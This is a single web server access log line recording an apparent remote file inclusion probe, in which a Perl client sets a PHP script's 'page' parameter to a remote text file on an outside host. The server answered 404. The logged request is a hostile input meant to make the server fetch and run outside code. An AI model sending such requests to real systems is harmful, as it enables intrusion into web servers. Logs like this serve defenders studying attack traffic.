88.198.54.67 - - [10/Nov/2008:09:01:35 -0800] "GET /logs/display.php?page=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
